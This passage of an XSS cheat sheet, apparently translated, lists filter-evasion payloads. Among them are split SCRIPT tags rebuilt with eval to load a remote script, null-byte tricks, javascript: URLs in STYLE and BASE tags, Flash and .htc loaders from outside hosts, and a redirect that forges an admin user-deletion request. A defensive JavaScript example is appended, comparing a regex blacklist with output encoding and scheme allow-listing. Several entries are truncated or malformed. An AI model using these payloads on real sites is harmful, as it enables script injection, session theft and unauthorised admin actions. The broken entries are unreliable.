(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
(10) Hexadecimal encoding without semicolons (calculator)
(11) Embedded tags that split up the JavaScript
(12) Embedded encoded tags that split up the JavaScript
(13) Embedded line breaks
(14) Embedded carriage return
(15) Embedded multi-line JavaScript injection, an extreme XSS example
(16) Getting around restricted characters (requires the same page)
<SCRIPT>z='document.'</SCRIPT>
<SCRIPT>z=z+'write("'</SCRIPT>
<SCRIPT>z=z+'<SCRIPT'</SCRIPT>
<SCRIPT>z=z+' src=ht'</SCRIPT>
<SCRIPT>z=z+'tp://ww'</SCRIPT>
<SCRIPT>z=z+'w.shell'</SCRIPT>
<SCRIPT>z=z+'.net/1.'</SCRIPT>
<SCRIPT>z=z+'js></SC'</SCRIPT>
<SCRIPT>z=z+'RIPT>")'</SCRIPT>
<SCRIPT>eval(z)</SCRIPT>
(17) Null characters
perl -e 'print " out
(18) Null characters, variant 2. Null characters are basically ineffective in China, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(53) STYLE background
<STYLE type="text/css">body{background:url("javascript:alert('xsss')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('xss');//">
(55) EMBED tag, which embeds a Flash file that contains XSS
<EMBED SRC="http://3366org/xss/xss.swf"></EMBED>
(56) Use ActionScript in Flash to obfuscate your XSS code
A="get";
B="URL(\"";
C="javascript:";
D="alert('xss');\")";
eval(A+B+C+D);
(57) XML namespace. The .htc file must be on the same server as your XSS carrier.
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3366org/xss/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered out, you can put the JS code in an image file and use that.
<SCRIPT src = ""> </SCRIPT>
(59) IMG embedded command, which can execute any command
(60) IMG embedded command (a.jpg is on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Escaping symbol filtering
<SCRIPT a=">" SRC="http://3#org/xss.js"></SCRIPT>
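As an added defensive example (not part of the original list), the JavaScript below runs a hypothetical regex blacklist over inputs constructed from entries (13), (18), (54) and (61), next to two controls that do not depend on recognising a payload: HTML output encoding and URL scheme allow-listing. The blacklist patterns, the function names and the example.invalid host are assumptions made for the illustration.

```javascript
// Added example, not from the original page. Inputs are constructed from
// entries (13), (18), (54) and (61); example.invalid is a placeholder host.

// Hypothetical blacklist of the kind these entries are written to slip past.
const BLACKLIST = [/<script>/i, /<script[^>]+src/i, /javascript:/i];
function blacklistFlags(input) {
  return BLACKLIST.some((re) => re.test(input));
}

// Control 1: encode untrusted text for HTML body and quoted attribute contexts.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeForHtml(input) {
  return String(input)
    .replace(/\0/g, "\uFFFD") // NUL is replaced before the text reaches the page
    .replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Control 2: parse first, then allow-list the scheme. The WHATWG URL parser
// drops tabs and line breaks, so a split scheme name is seen as a browser sees it.
function isAllowedUrl(value) {
  try {
    const { protocol } = new URL(value, "https://example.invalid/");
    return protocol === "http:" || protocol === "https:";
  } catch {
    return false;
  }
}

const markupSamples = {
  plainSrc: '<SCRIPT SRC="http://example.invalid/xss.js"></SCRIPT>',
  quotedGt: '<SCRIPT a=">" SRC="http://example.invalid/xss.js"></SCRIPT>',
  nulInTag: '<SCR\0IPT>alert("XSS")</SCR\0IPT>',
};
const urlSamples = {
  relative: "/img/a.jpg",
  baseHref: "javascript:alert('xss');//",
  lineBreak: "jav\nascript:alert('xss');",
};

function report() {
  const rows = [];
  for (const [name, s] of Object.entries(markupSamples))
    rows.push({ name, flagged: blacklistFlags(s), safe: encodeForHtml(s) });
  for (const [name, s] of Object.entries(urlSamples))
    rows.push({ name, flagged: blacklistFlags(s), allowed: isAllowedUrl(s) });
  return rows;
}
console.table(report());
```

The encoder only covers HTML body and quoted-attribute contexts; values that end up in URL or CSS contexts, as in (53) and (54), need the scheme check or should not take untrusted input at all.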